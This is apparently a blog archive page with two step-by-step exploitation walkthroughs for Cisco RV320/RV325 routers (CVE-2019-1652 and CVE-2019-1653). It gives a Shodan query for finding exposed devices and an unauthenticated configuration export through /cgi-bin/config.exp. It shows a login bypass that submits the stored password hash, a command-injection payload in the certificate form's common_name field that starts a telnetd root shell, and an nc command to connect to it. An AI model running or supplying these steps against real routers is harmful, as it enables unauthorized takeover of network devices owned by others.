Posts

Showing posts from June, 2021

CVE-2019-1652 Cisco RV320/RV325 Router Command Injection Vulnerability

Image
Steps Bypass authentication and login to Cisco RV320 or RV325 router by exploiting CVE-2019-1653 described in previous post. Go to Certificate Management > Certificate Generator page. Fill any junk values in the form. Turn on intercept in BurpSuite and click on Save  button In BurpSuite interceptor, replace the common_name parameter value with the URL encoded command for starting command shell on router using telnetd service. That is replace common_name value with URL encoded string of following command.  a'$(telnetd -l /bin/sh -p 1234)'b URL encoded string corresponding to above command is a%27%24%28telnetd%20-l%20%2Fbin%2Fsh%20-p%201234%29%27b Now the router will start listening on port 1234. Connect to the shell using following command. nc -n ipAddress 1234 Video

CVE-2019-1653 Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability

Image
Introduction Vulnerability CVE-2019-1653 allows export of a configuration file from vulnerable Cisco RV320 and RV325 series routers. This could be exploited to gain administrative access to the router. Device Identification Identify the vulnerable devices using shodan query: http.favicon.hash:-299287097 Apache Configuration Export Export the router configuration file by appending  /cgi-bin/config.exp to the IP address of the router. Authentication Bypass Open the configuration file and get the username and password hash. Start Burpsuite  In Proxy tab click on Open Browser  to open Burp embedded browser. Open the router web management url in Burp embedded browser. Turn on intercept in Burp proxy. Enter the username as in configuration file and any password. In the burp proxy Intercept , replace value of password= parameter with hash in configuration file. Forward the request and turn off the intercept to login to the router. Video Reference: https://www.redteam-...